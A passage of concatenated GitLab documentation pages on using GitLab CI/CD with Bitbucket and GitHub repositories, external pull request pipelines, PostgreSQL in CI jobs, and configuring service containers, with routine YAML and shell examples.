     --data "{ \"state\": \"$BITBUCKET_STATE\", \"key\": \"$BITBUCKET_KEY\", \"description\": \"$BITBUCKET_DESCRIPTION\", \"url\": \"$CI_PROJECT_URL/-/jobs/$CI_JOB_ID\" }"
   ```

1. In Bitbucket, create a `.gitlab-ci.yml` file to use the script to push pipeline successes and failures to Bitbucket. Similar to the script added previously, this file is copied to the GitLab repository as part of the mirroring process.

   ```yaml
   stages:
     - test
     - ci_status

   unit-tests:
     script:
       - echo "Success. Add your tests!"

   success:
     stage: ci_status
     before_script:
       - ""
     after_script:
       - ""
     script:
       - BUILD_STATUS=passed BUILD_KEY=push ./build_status
     when: on_success

   failure:
     stage: ci_status
     before_script:
       - ""
     after_script:
       - ""
     script:
       - BUILD_STATUS=failed BUILD_KEY=push ./build_status
     when: on_failure
   ```

GitLab is now configured to mirror changes from Bitbucket, run the CI/CD pipelines configured in `.gitlab-ci.yml`, and push the status to Bitbucket.
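Before wiring the `build_status` script up to Bitbucket, you can exercise its status mapping locally. The sketch below extracts just the `case` logic into a function so it can be run without network access; the function name and the `UNKNOWN` fallback are ours, not part of the script above.

```shell
#!/usr/bin/env bash
# Sketch: the BUILD_STATUS -> Bitbucket state mapping from the build_status
# script, isolated into a function for local testing.
bitbucket_state() {
  case "$1" in
    running) echo "INPROGRESS" ;;
    passed)  echo "SUCCESSFUL" ;;
    failed)  echo "FAILED" ;;
    *)       echo "UNKNOWN" ;;  # fallback added here; the original script has no default case
  esac
}

bitbucket_state passed  # prints SUCCESSFUL
```

If this mapping behaves as expected, any remaining problems are in the API call itself (credentials, repository path, or commit SHA).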
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Using GitLab CI/CD with a GitHub repository
breadcrumbs:
  - doc
  - ci
  - ci_cd_for_external_repos
---
{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

GitLab CI/CD can be used with **GitHub.com** and **GitHub Enterprise** by creating a [CI/CD project](_index.md) to connect your GitHub repository to GitLab.

<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> Watch a video on [Using GitLab CI/CD pipelines with GitHub repositories](https://www.youtube.com/watch?v=qgl3F2j-1cI).

{{< alert type="note" >}}

Because of [GitHub limitations](https://gitlab.com/gitlab-org/gitlab/-/issues/9147), [GitHub OAuth](../../integration/github.md#enable-github-oauth-in-gitlab) cannot be used to authenticate with GitHub as an external CI/CD repository.

{{< /alert >}}

## Connect with personal access token

Personal access tokens can only be used to connect GitHub.com repositories to GitLab, and the GitHub user must have the [owner role](https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github).

To perform a one-off authorization with GitHub to grant GitLab access to your repositories:

1. In GitHub, create a token:
   1. Open <https://github.com/settings/tokens/new>.
   1. Create a personal access token.
   1. Enter a **Token description** and update the scope to allow `repo` and `admin:repo_hook` so that GitLab can access your project, update commit statuses, and create a webhook to notify GitLab of new commits.
1. In GitLab, create a project:
   1. On the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**.
   1. Select **Run CI/CD for external repository**.
   1. Select **GitHub**.
   1. For **Personal access token**, paste the token.
   1. Select **List Repositories**.
   1. Select **Connect** to select the repository.
1. In GitHub, add a `.gitlab-ci.yml` to [configure GitLab CI/CD](../quick_start/_index.md).

GitLab:

1. Imports the project.
1. Enables [pull mirroring](../../user/project/repository/mirror/pull.md).
1. Enables the [GitHub project integration](../../user/project/integrations/github.md).
1. Creates a webhook on GitHub to notify GitLab of new commits.

## Connect manually

To use **GitHub Enterprise** with **GitLab.com**, use this method.

To manually enable GitLab CI/CD for your repository:

1. In GitHub, create a token:
   1. Open <https://github.com/settings/tokens/new>.
   1. Create a personal access token.
   1. Enter a **Token description** and update the scope to allow `repo` so that GitLab can access your project and update commit statuses.
1. In GitLab, create a project:
   1. On the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**.
   1. Select **Run CI/CD for external repository** and **Repository by URL**.
   1. In the **Git repository URL** field, enter the HTTPS URL for your GitHub repository. If your project is private, use the personal access token you just created for authentication.
   1. Fill in all the other fields and select **Create project**. GitLab automatically configures polling-based pull mirroring.
1. In GitLab, enable the [GitHub project integration](../../user/project/integrations/github.md):
   1. On the left sidebar, select **Settings > Integrations**.
   1. Select the **Active** checkbox.
   1. Paste your personal access token and HTTPS repository URL into the form and select **Save**.
1. In GitLab, create a personal access token with `api` scope to authenticate the GitHub webhook notifying GitLab of new commits.
1. In GitHub, from **Settings > Webhooks**, create a webhook to notify GitLab of new commits.

   The webhook URL should be set to the GitLab API to [trigger pull mirroring](../../api/project_pull_mirroring.md#start-the-pull-mirroring-process-for-a-project), using the GitLab personal access token we just created:

   ```plaintext
   https://gitlab.com/api/v4/projects/<NAMESPACE>%2F<PROJECT>/mirror/pull?private_token=<PERSONAL_ACCESS_TOKEN>
   ```

   Select the **Let me select individual events** option, then check the **Pull requests** and **Pushes** checkboxes. These settings are needed for [pipelines for external pull requests](_index.md#pipelines-for-external-pull-requests).

1. In GitHub, add a `.gitlab-ci.yml` to configure GitLab CI/CD.
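To confirm the connection end to end, a minimal `.gitlab-ci.yml` in the GitHub repository is enough; the job name and script here are illustrative, not prescribed by the steps above.

```yaml
# Minimal smoke-test pipeline: after pushing this file to GitHub, the mirror
# update should trigger a pipeline in GitLab, and the commit status should
# appear back on the commit in GitHub.
smoke-test:
  script:
    - echo "GitLab CI/CD is connected to this GitHub repository"
```

Once this pipeline runs and its status shows up on GitHub, you can replace it with your real build and test jobs.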
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
description: GitHub, Bitbucket, external sources, mirroring, and cross-platform.
title: GitLab CI/CD for external repositories
breadcrumbs:
  - doc
  - ci
  - ci_cd_for_external_repos
---
{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

GitLab CI/CD can be used with [GitHub](github_integration.md), [Bitbucket Cloud](bitbucket_integration.md), or any other Git server. Some [known issues](#known-issues) exist.

Instead of moving your entire project to GitLab, you can connect your external repository to get the benefits of GitLab CI/CD.

Connecting an external repository sets up [repository mirroring](../../user/project/repository/mirror/_index.md) and creates a lightweight project with issues, merge requests, wiki, and snippets disabled. These features [can be re-enabled later](../../user/project/settings/_index.md#configure-project-features-and-permissions).

## Connect to an external repository

To connect to an external repository:

1. On the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**.
1. Select **Run CI/CD for external repository**.
1. Select **GitHub** or **Repository by URL**.
1. Complete the fields.

If the **Run CI/CD for external repository** option is not available:

- The GitLab instance might not have any import sources configured. Ask an administrator to check the [import sources configuration](../../administration/settings/import_and_export_settings.md#configure-allowed-import-sources).
- [Project mirroring](../../user/project/repository/mirror/_index.md) might be disabled. If disabled, only administrators can use the **Run CI/CD for external repository** option. Ask an administrator to check the [project mirroring configuration](../../administration/settings/visibility_and_access_controls.md#enable-project-mirroring).

## Pipelines for external pull requests

When using GitLab CI/CD with an [external repository on GitHub](github_integration.md), it's possible to run a pipeline in the context of a Pull Request.

When you push changes to a remote branch in GitHub, GitLab CI/CD can run a pipeline for the branch. However, when you open or update a Pull Request for that branch, you may want to:

- Run extra jobs.
- Not run specific jobs.

For example:

```yaml
always-run:
  script: echo 'this should always run'

on-pull-requests:
  script: echo 'this should run on pull requests'
  rules:
    - if: $CI_PIPELINE_SOURCE == "external_pull_request_event"

except-pull-requests:
  script: echo 'This should not run for pull requests, but runs in other cases.'
  rules:
    - if: $CI_PIPELINE_SOURCE == "external_pull_request_event"
      when: never
    - when: on_success
```

### Pipeline execution for external pull requests

When a repository is imported from GitHub, GitLab subscribes to webhooks for `push` and `pull_request` events. Once a `pull_request` event is received, the Pull Request data is stored and kept as a reference. If the Pull Request has just been created, GitLab immediately creates a pipeline for the external pull request.

If changes are pushed to the branch referenced by the Pull Request and the Pull Request is still open, a pipeline for the external pull request is created. GitLab CI/CD creates 2 pipelines in this case: one for the branch push and one for the external pull request.

After the Pull Request is closed, no pipelines are created for the external pull request, even if new changes are pushed to the same branch.

### Additional predefined variables

By using pipelines for external pull requests, GitLab exposes additional [predefined variables](../variables/predefined_variables.md) to the pipeline jobs. The variable names are prefixed with `CI_EXTERNAL_PULL_REQUEST_`.

### Known issues

This feature does not support:

- The [manual connection method](github_integration.md#connect-manually) required for GitHub Enterprise. If the integration is connected manually, external pull requests [do not trigger pipelines](https://gitlab.com/gitlab-org/gitlab/-/issues/323336#note_884820753).
- Pull requests from fork repositories. [Pull Requests from fork repositories are ignored](https://gitlab.com/gitlab-org/gitlab/-/issues/5667).

Given that GitLab creates 2 pipelines, if changes are pushed to a remote branch that references an open Pull Request, both contribute to the status of the Pull Request via the GitHub integration. If you want to exclusively run pipelines on external pull requests and not on branches, you can add `except: [branches]` to the job specs. [Read more](https://gitlab.com/gitlab-org/gitlab/-/issues/24089#workaround).

## Troubleshooting

- [Pull mirroring is not triggering pipelines](../../user/project/repository/mirror/troubleshooting.md#pull-mirroring-is-not-triggering-pipelines).
- [Fix hard failures when mirroring](../../user/project/repository/mirror/pull.md#fix-hard-failures-when-mirroring).
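The additional predefined variables described above can be used like any other CI/CD variable. For illustration, a job could surface the Pull Request context in its log (a sketch; the job name `show-pr-context` is hypothetical, while `CI_EXTERNAL_PULL_REQUEST_IID` and `CI_EXTERNAL_PULL_REQUEST_TARGET_BRANCH_NAME` are among the documented variables):

```yaml
show-pr-context:
  rules:
    - if: $CI_PIPELINE_SOURCE == "external_pull_request_event"
  script:
    - echo "Pull Request $CI_EXTERNAL_PULL_REQUEST_IID targets $CI_EXTERNAL_PULL_REQUEST_TARGET_BRANCH_NAME"
```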
---
stage: Verify
group: Runner
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Using PostgreSQL
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

As many applications depend on PostgreSQL as their database, you have to use it to run your tests.

## Use PostgreSQL with the Docker executor

To pass variables set in the GitLab UI to service containers, you must [define the variables](../variables/_index.md#define-a-cicd-variable-in-the-ui). You must define your variables as either Group or Project, then call the variables in your job as shown in the following workaround.

Postgres 15.4 and later versions do not substitute schemas or owner names into extension scripts if they include quote (`"`), backslash (`\`), or dollar sign (`$`) symbols. If the CI variables are not configured, the value uses the environment variable name as a string instead. For example, `POSTGRES_USER: $USER` results in the `POSTGRES_USER` variable being set to `'$USER'`, which causes Postgres to show the following error:

```shell
Fatal: invalid character in extension
```

The workaround is to set your variables in [GitLab CI/CD variables](../variables/_index.md) or set variables in string form:

1. [Set Postgres variables in GitLab](../variables/_index.md#for-a-project). Variables set in the GitLab UI are not passed down to the service containers.
1. In the `.gitlab-ci.yml` file, specify a Postgres image:

   ```yaml
   default:
     services:
       - postgres
   ```

1. In the `.gitlab-ci.yml` file, add your defined variables:

   ```yaml
   variables:
     POSTGRES_DB: $POSTGRES_DB
     POSTGRES_USER: $POSTGRES_USER
     POSTGRES_PASSWORD: $POSTGRES_PASSWORD
     POSTGRES_HOST_AUTH_METHOD: trust
   ```

   For more information about using `postgres` for the `Host`, see [How services are linked to the job](_index.md#how-services-are-linked-to-the-job).

1. Configure your application to use the database, for example:

   ```yaml
   Host: postgres
   User: $POSTGRES_USER
   Password: $POSTGRES_PASSWORD
   Database: $POSTGRES_DB
   ```

Alternatively, you can set variables as a string in the `.gitlab-ci.yml` file:

```yaml
variables:
  POSTGRES_DB: DB_name
  POSTGRES_USER: username
  POSTGRES_PASSWORD: password
  POSTGRES_HOST_AUTH_METHOD: trust
```

You can use any other Docker image available on [Docker Hub](https://hub.docker.com/_/postgres). For example, to use PostgreSQL 14.3, the service becomes `postgres:14.3`.

The `postgres` image can accept some environment variables. For more details, see the documentation on [Docker Hub](https://hub.docker.com/_/postgres).

## Use PostgreSQL with the Shell executor

You can also use PostgreSQL on manually configured servers that are using GitLab Runner with the Shell executor.

First install the PostgreSQL server:

```shell
sudo apt-get install -y postgresql postgresql-client libpq-dev
```

The next step is to create a user, so sign in to PostgreSQL:

```shell
sudo -u postgres psql -d template1
```

Then create a user (in our case `runner`) which is used by your application. Change `$password` in the following command to a strong password.

{{< alert type="note" >}}

Be sure to not enter `template1=#` in the following commands, as that's part of the PostgreSQL prompt.

{{< /alert >}}

```shell
template1=# CREATE USER runner WITH PASSWORD '$password' CREATEDB;
```

The created user has the privilege to create databases (`CREATEDB`). The following steps describe how to create a database explicitly for that user. Privileges allow your testing framework to create and drop databases as needed.

Create the database and grant all privileges to it for the user `runner`:

```shell
template1=# CREATE DATABASE nice_marmot OWNER runner;
```

If all went well, you can now quit the database session:

```shell
template1=# \q
```

Now, try to connect to the newly created database with the user `runner` to check that everything is in place:

```shell
psql -U runner -h localhost -d nice_marmot -W
```

This command explicitly directs `psql` to connect to localhost to use the md5 authentication. If you omit this step, you are denied access.

Finally, configure your application to use the database, for example:

```yaml
Host: localhost
User: runner
Password: $password
Database: nice_marmot
```

## Example project

We have set up an [Example PostgreSQL Project](https://gitlab.com/gitlab-examples/postgres) for your convenience that runs on [GitLab.com](https://gitlab.com) using our publicly available [instance runners](../runners/_index.md).

Want to hack on it? Fork it, commit, and push your changes. In a few moments, the changes are picked up by a public runner and the job begins.
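Putting the Docker executor pieces together, the following job sketches an end-to-end check of the service connection. The job name and the use of `pg_isready` (a client utility shipped in the official `postgres` image) are illustrative assumptions, not part of the steps above:

```yaml
check-db-connection:
  image: postgres:14.3
  services:
    - postgres:14.3
  variables:
    POSTGRES_DB: nice_marmot
    POSTGRES_USER: runner
    POSTGRES_PASSWORD: password
    POSTGRES_HOST_AUTH_METHOD: trust
  script:
    # The service is reachable under the hostname `postgres`.
    - pg_isready --host=postgres --username=runner --dbname=nice_marmot
```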
---
stage: Verify
group: Runner
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Services
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

When you configure CI/CD, you specify an image, which is used to create the container where your jobs run. To specify this image, you use the `image` keyword. You can specify an additional image by using the `services` keyword. This additional image is used to create another container, which is available to the first container. The two containers have access to one another and can communicate when running the job.

The service image can run any application, but the most common use case is to run a database container, for example:

- [MySQL](mysql.md)
- [PostgreSQL](postgres.md)
- [Redis](redis.md)
- [GitLab](gitlab.md) as an example for a microservice offering a JSON API

Consider that you're developing a content management system that uses a database for storage. You need a database to test all features in the application. Running a database container as a service image is a good use case in this scenario. Use an existing image and run it as an additional container instead of installing `mysql` every time you build a project.

You're not limited to only database services. You can add as many services as you need to `.gitlab-ci.yml` or manually modify the [`config.toml`](https://docs.gitlab.com/runner/configuration/advanced-configuration.html). Any image found at [Docker Hub](https://hub.docker.com/) or your private container registry can be used as a service.

For information about using private images, see [Access an image from a private container registry](../docker/using_docker_images.md#access-an-image-from-a-private-container-registry).

Services inherit the same DNS servers, search domains, and additional hosts as the CI container itself.

## How services are linked to the job

To better understand how container linking works, read [Linking containers together](https://docs.docker.com/network/links/).
If you add `mysql` as a service to your application, the image is used to create a container that's linked to the job container. The service container for MySQL is accessible under the hostname `mysql`. To access your database service, connect to the host named `mysql` instead of a socket or `localhost`. Read more in [accessing the services](#accessing-the-services).

## How the health check of services works

Services are designed to provide additional features which are **network accessible**. They may be a database like MySQL, or Redis, and even `docker:dind` which allows you to use Docker-in-Docker (DinD). It can be practically anything that's required for the CI/CD job to proceed, and is accessed by network.

To make sure this works, the runner:

1. Checks which ports are exposed from the container by default.
1. Starts a special container that waits for these ports to be accessible.

If the second stage of the check fails, it prints the warning: `*** WARNING: Service XYZ probably didn't start properly`.

This issue can occur because:

- There is no opened port in the service.
- The service was not started properly before the timeout, and the port is not responding.

In most cases it affects the job, but there may be situations when the job still succeeds even if that warning was printed. For example:

- The service was started shortly after the warning was raised, and the job is not using the linked service from the beginning. In that case, when the job needed to access the service, it may have been already there waiting for connections.
- The service container is not providing any networking service, but it's doing something with the job's directory (all services have the job directory mounted as a volume under `/builds`). In that case, the service does its job, and because the job is not trying to connect to it, it does not fail.

If the services start successfully, they start before the [`before_script`](../yaml/_index.md#before_script) runs.
This means you can write a `before_script` that queries the service. Services stop at the end of the job, even if the job fails.

## Using software provided by a service image

When you specify the `service`, this provides **network accessible** services. A database is the simplest example of such a service.

The services feature does not add any software from the defined `services` images to the job's container.

For example, if you have the following `services` defined in your job, the `php`, `node` or `go` commands are **not** available for your script, and the job fails:

```yaml
job:
  services:
    - php:7
    - node:latest
    - golang:1.10
  image: alpine:3.7
  script:
    - php -v
    - node -v
    - go version
```

If you need to have `php`, `node` and `go` available for your script, you should either:

- Choose an existing Docker image that contains all required tools.
- Create your own Docker image, with all the required tools included, and use that in your job.

## Define `services` in the `.gitlab-ci.yml` file

It's also possible to define different images and services per job:

```yaml
default:
  before_script:
    - bundle install

test:2.6:
  image: ruby:2.6
  services:
    - postgres:11.7
  script:
    - bundle exec rake spec

test:2.7:
  image: ruby:2.7
  services:
    - postgres:12.2
  script:
    - bundle exec rake spec
```

Or you can pass some [extended configuration options](../docker/using_docker_images.md#extended-docker-configuration-options) for `image` and `services`:

```yaml
default:
  image:
    name: ruby:2.6
    entrypoint: ["/bin/bash"]
  services:
    - name: my-postgres:11.7
      alias: db,postgres,pg
      entrypoint: ["/usr/local/bin/db-postgres"]
      command: ["start"]
  before_script:
    - bundle install

test:
  script:
    - bundle exec rake spec
```

## Accessing the services

If you need a Wordpress instance to test API integration with your application, you can use the [`tutum/wordpress`](https://hub.docker.com/r/tutum/wordpress/) image in your `.gitlab-ci.yml` file:

```yaml
services:
  - tutum/wordpress:latest
```

If you don't [specify a service alias](#available-settings-for-services), when the job runs, `tutum/wordpress` is started. You have access to it from your build container under two hostnames:

- `tutum-wordpress`
- `tutum__wordpress`

Hostnames with underscores are not RFC valid and may cause problems in third-party applications.

The default aliases for the service's hostname are created from its image name following these rules:

- Everything after the colon (`:`) is stripped.
- Slash (`/`) is replaced with double underscores (`__`) and the primary alias is created.
- Slash (`/`) is replaced with a single dash (`-`) and the secondary alias is created.

To override the default behavior, you can [specify one or more service aliases](#available-settings-for-services).

### Connecting services

You can use inter-dependent services with complex jobs, like end-to-end tests where an external API needs to communicate with its own database.

For example, for an end-to-end test for a front-end application that uses an API, and where the API needs a database:

```yaml
end-to-end-tests:
  image: node:latest
  services:
    - name: selenium/standalone-firefox:${FIREFOX_VERSION}
      alias: firefox
    - name: registry.gitlab.com/organization/private-api:latest
      alias: backend-api
    - name: postgres:14.3
      alias: db
  variables:
    FF_NETWORK_PER_BUILD: 1
    POSTGRES_PASSWORD: supersecretpassword
    BACKEND_POSTGRES_HOST: postgres
  script:
    - npm install
    - npm test
```

For this solution to work, you must use [the networking mode that creates a new network for each job](https://docs.gitlab.com/runner/executors/docker.html#create-a-network-for-each-job).

## Passing CI/CD variables to services

You can also pass custom CI/CD [variables](../variables/_index.md) to fine tune your Docker `images` and `services` directly in the `.gitlab-ci.yml` file. For more information, read about [`.gitlab-ci.yml` defined variables](../variables/_index.md#define-a-cicd-variable-in-the-gitlab-ciyml-file).
```yaml
# The following variables are automatically passed down to the Postgres container
# as well as the Ruby container and available within each.
variables:
  HTTPS_PROXY: "https://10.1.1.1:8090"
  HTTP_PROXY: "https://10.1.1.1:8090"
  POSTGRES_DB: "my_custom_db"
  POSTGRES_USER: "postgres"
  POSTGRES_PASSWORD: "example"
  PGDATA: "/var/lib/postgresql/data"
  POSTGRES_INITDB_ARGS: "--encoding=UTF8 --data-checksums"

default:
  services:
    - name: postgres:11.7
      alias: db
      entrypoint: ["docker-entrypoint.sh"]
      command: ["postgres"]
  image:
    name: ruby:2.6
    entrypoint: ["/bin/bash"]
  before_script:
    - bundle install

test:
  script:
    - bundle exec rake spec
```

## Available settings for `services`

| Setting | Required | GitLab version | Description |
|---------|----------|----------------|-------------|
| `name` | yes, when used with any other option | 9.4 | Full name of the image to use. If the full image name includes a registry hostname, use the `alias` option to define a shorter service access name. For more information, see [Accessing the services](#accessing-the-services). |
| `entrypoint` | no | 9.4 | Command or script to execute as the container's entrypoint. It's translated to the Docker `--entrypoint` option while creating the container. The syntax is similar to the [`Dockerfile` `ENTRYPOINT`](https://docs.docker.com/reference/dockerfile/#entrypoint) directive, where each shell token is a separate string in the array. |
| `command` | no | 9.4 | Command or script that should be used as the container's command. It's translated to arguments passed to Docker after the image's name. The syntax is similar to the [`Dockerfile` `CMD`](https://docs.docker.com/reference/dockerfile/#cmd) directive, where each shell token is a separate string in the array. |
| `alias` | no | 9.4 | Additional aliases to access the service from the job's container. Multiple aliases can be separated by spaces or commas. For more information, see [Accessing the services](#accessing-the-services). Using an alias as a container name for the Kubernetes executor was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/421131) in GitLab Runner 17.9. For more information, see [Using aliases as service container names for the Kubernetes executor](#using-aliases-as-service-container-names-for-the-kubernetes-executor). |
| `variables` | no | 14.5 | Additional environment variables that are passed exclusively to the service. The syntax is the same as [Job Variables](../variables/_index.md). Service variables cannot reference themselves. |
| `pull_policy` | no | 15.1 | Specify how the runner pulls Docker images when it executes a job. Valid values are `always`, `if-not-present`, and `never`. Default is `always`. For more information, see [`services:pull_policy`](../yaml/_index.md#servicespull_policy). |

## Starting multiple services from the same image

Before the new extended Docker configuration options, the following configuration would not work properly:

```yaml
services:
  - mysql:latest
  - mysql:latest
```

The runner would start two containers, each using the `mysql:latest` image. However, both of them would be added to the job's container with the `mysql` alias, based on the [default hostname naming](#accessing-the-services). This would end with one of the services not being accessible.

After the new extended Docker configuration options, the previous example would look like this:

```yaml
services:
  - name: mysql:latest
    alias: mysql-1
  - name: mysql:latest
    alias: mysql-2
```

The runner still starts two containers using the `mysql:latest` image, however now each of them is also accessible with the alias configured in the `.gitlab-ci.yml` file.

## Setting a command for the service

Let's assume you have a `super/sql:latest` image with some SQL database in it. You would like to use it as a service for your job.
Let's also assume that this image does not start the database process while starting the container. The user needs to manually use `/usr/bin/super-sql run` as a command to start the database.

Before the new extended Docker configuration options, you would need to:

- Create your own image based on the `super/sql:latest` image.
- Add the default command.
- Use the image in the job's configuration.

- `my-super-sql:latest` image's Dockerfile:

  ```dockerfile
  FROM super/sql:latest
  CMD ["/usr/bin/super-sql", "run"]
  ```

- In the job in the `.gitlab-ci.yml`:

  ```yaml
  services:
    - my-super-sql:latest
  ```

After the new extended Docker configuration options, you can set a `command` in the `.gitlab-ci.yml` file instead:

```yaml
services:
  - name: super/sql:latest
    command: ["/usr/bin/super-sql", "run"]
```

The syntax of `command` is similar to [Dockerfile `CMD`](https://docs.docker.com/reference/dockerfile/#cmd).

## Using aliases as service container names for the Kubernetes executor

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/421131) in GitLab and GitLab Runner 17.9.

{{< /history >}}

You can use service aliases as service container names for the Kubernetes executor. GitLab Runner names containers based on the following conditions:

- When multiple aliases are set for a service, the service container is named after the first alias that:
  - Isn't already used by another service container.
  - Follows the [Kubernetes constraints for label names](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
- When aliases can't be used to name a service container, GitLab Runner falls back to the `svc-i` pattern.

The following examples illustrate how aliases are used to name service containers for the Kubernetes executor.
### One alias per service

In the following `.gitlab-ci.yml` file:

```yaml
job:
  image: alpine:latest
  script:
    - sleep 10
  services:
    - name: alpine:latest
      alias: alpine
    - name: mysql:latest
      alias: mysql
```

The system creates a job Pod with containers named `alpine` and `mysql` in addition to the standard `build` and `helper` containers. These aliases are used because they:

- Are not used by another service container.
- Follow the [Kubernetes constraints for label names](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).

However, in the following `.gitlab-ci.yml`:

```yaml
job:
  image: alpine:latest
  script:
    - sleep 10
  services:
    - name: mysql:lts
      alias: mysql
    - name: mysql:latest
      alias: mysql
```

The system creates two more containers named `mysql` and `svc-0` in addition to the `build` and `helper` containers. The `mysql` container corresponds to the `mysql:lts` image, while the `svc-0` container corresponds to the `mysql:latest` image.

### Multiple aliases per service

In the following `.gitlab-ci.yml` file:

```yaml
job:
  image: alpine:latest
  script:
    - sleep 10
  services:
    - name: alpine:latest
      alias: alpine,alpine-latest
    - name: alpine:edge
      alias: alpine,alpine-edge,alpine-latest
```

The system creates two more containers in addition to the `build` and `helper` containers:

- `alpine`, which should correspond to the container with the `alpine:latest` image.
- `alpine-edge`, which should correspond to the container with the `alpine:edge` image (the `alpine` alias being already used for the previous container).

In this example, the alias `alpine-latest` is not being used.

However, in the following `.gitlab-ci.yml`:

```yaml
job:
  image: alpine:latest
  script:
    - sleep 10
  services:
    - name: alpine:latest
      alias: alpine,alpine-edge
    - name: alpine:edge
      alias: alpine,alpine-edge
    - name: alpine:3.21
      alias: alpine,alpine-edge
```

In addition to the `build` and `helper` containers, three more containers are created:

- `alpine` should refer to the container with the `alpine:latest` image.
- `alpine-edge` should refer to the container with the `alpine:edge` image (the `alpine` alias being already used for the previous container).
- `svc-0` should refer to the container with the `alpine:3.21` image (the `alpine` and `alpine-edge` aliases being already used for the previous containers).

Note that:

- The `i` in the `svc-i` pattern does not indicate the service's position in the provided list. Instead, it represents the service's position when no available alias is found.
- When an invalid alias is provided (one that doesn't meet the Kubernetes constraint), the job fails with the following error (example with the alias `alpine_edge`). This failure occurs because aliases are also used to create local DNS entries on the job Pod.

  ```plaintext
  ERROR: Job failed (system failure): prepare environment: setting up build pod: provided host alias alpine_edge for service alpine:edge is invalid DNS. a lowercase RFC 1123 subdomain must consist of lower case alphanumeric characters, '-' or '.', and must start and end with an alphanumeric character (e.g. 'example.com', regex used for validation is '[a-z0-9]([-a-z0-9]*[a-z0-9])?(\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*'). Check https://docs.gitlab.com/runner/shells/index.html#shell-profile-loading for more information.
  ```

## Using `services` with `docker run` (Docker-in-Docker) side-by-side

Containers started with `docker run` can also connect to services provided by GitLab. If booting a service is expensive or time consuming, you can run tests from different client environments, while booting up the tested service only once.
```yaml access-service: stage: build image: docker:20.10.16 services: - docker:dind # necessary for docker run - tutum/wordpress:latest variables: FF_NETWORK_PER_BUILD: "true" # activate container-to-container networking script: | docker run --rm --name curl \ --volume "$(pwd)":"$(pwd)" \ --workdir "$(pwd)" \ --network=host \ curlimages/curl:7.74.0 curl "http://tutum-wordpress" ``` For this solution to work, you must: - Use [the networking mode that creates a new network for each job](https://docs.gitlab.com/runner/executors/docker.html#create-a-network-for-each-job). - [Not use the Docker executor with Docker socket binding](../docker/using_docker_build.md#use-docker-socket-binding). If you must, then in the previous example, instead of `host`, use the dynamic network name created for this job. ## How Docker integration works The following is a high level overview of the steps performed by Docker during job time. 1. Create any service container: `mysql`, `postgresql`, `mongodb`, `redis`. 1. Create a cache container to store all volumes as defined in `config.toml` and `Dockerfile` of build image (`ruby:2.6` as in the previous examples). 1. Create a build container and link any service container to build container. 1. Start the build container, and send a job script to the container. 1. Run the job script. 1. Checkout code in: `/builds/group-name/project-name/`. 1. Run any step defined in `.gitlab-ci.yml`. 1. Check the exit status of build script. 1. Remove the build container and all created service containers. ## Capturing service container logs {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/merge_requests/3680) in GitLab Runner 15.6. {{< /history >}} Logs generated by applications running in service containers can be captured for subsequent examination and debugging. View service container logs when a service container starts successfully but causes job failures due to unexpected behavior. 
The logs can indicate missing or incorrect configuration of the service in the container. `CI_DEBUG_SERVICES` should only be enabled when service containers are being actively debugged as there are both storage and performance consequences to capturing service container logs. To enable service logging, add the `CI_DEBUG_SERVICES` variable to the project's `.gitlab-ci.yml` file: ```yaml variables: CI_DEBUG_SERVICES: "true" ``` Accepted values are: - Enabled: `TRUE`, `true`, `True` - Disabled: `FALSE`, `false`, `False` Any other values result in an error message and effectively disable the feature. When enabled, logs for all service containers are captured and streamed into the jobs trace log concurrently with other logs. Logs from each container are prefixed with the container's aliases, and displayed in a different color. {{< alert type="note" >}} To diagnose job failures, you can adjust the logging level in your service container for which you want to capture logs. The default logging level might not provide sufficient troubleshooting information. {{< /alert >}} {{< alert type="warning" >}} Enabling `CI_DEBUG_SERVICES` might reveal masked variables. When `CI_DEBUG_SERVICES` is enabled, service container logs and the CI job's logs are streamed to the job's trace log concurrently. This means that the service container logs might get inserted into a job's masked log. This would thwart the variable masking mechanism and result in the masked variable being revealed. {{< /alert >}} See [Mask a CI/CD Variable](../variables/_index.md#mask-a-cicd-variable) ## Debug a job locally The following commands are run without root privileges. Verify that you can run Docker commands with your user account. 
First start by creating a file named `build_script`: ```shell cat <<EOF > build_script git clone https://gitlab.com/gitlab-org/gitlab-runner.git /builds/gitlab-org/gitlab-runner cd /builds/gitlab-org/gitlab-runner make runner-bin-host EOF ``` Here we use as an example the GitLab Runner repository which contains a Makefile, so running `make` executes the target defined in the Makefile. Instead of `make runner-bin-host`, you could run the command which is specific to your project. Then create a service container: ```shell docker run -d --name service-redis redis:latest ``` The previous command creates a service container named `service-redis` using the latest Redis image. The service container runs in the background (`-d`). Finally, create a build container by executing the `build_script` file we created earlier: ```shell docker run --name build -i --link=service-redis:redis golang:latest /bin/bash < build_script ``` The previous command creates a container named `build` that is spawned from the `golang:latest` image and has one service linked to it. The `build_script` is piped using `stdin` to the bash interpreter which in turn executes the `build_script` in the `build` container. Use the following command to remove containers after testing is complete: ```shell docker rm -f -v build 